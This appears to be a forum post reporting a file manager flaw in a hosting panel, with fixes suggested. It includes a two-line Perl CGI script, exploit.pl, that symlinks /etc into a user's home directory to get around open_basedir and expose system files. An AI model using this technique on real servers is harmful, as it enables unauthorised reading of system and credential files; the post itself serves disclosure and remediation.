Yes, I too found that error, I had originally ran it from command-line and the php-fpm openbase dir was not in effect. But, try this.
Filemanager, cgi-bin, create new file
exploit.pl
#!/usr/bin/perl -w
symlink("/etc", "/home/admin/etc");
Execute from browser, follow above steps, exploit is realized.
And not so sure it is easy to not display hardlinks, possibly symlimks...
MOST IMPORTANT, remove root from filemanager.
Also, trick for quick fix, only display files owned by that user/client.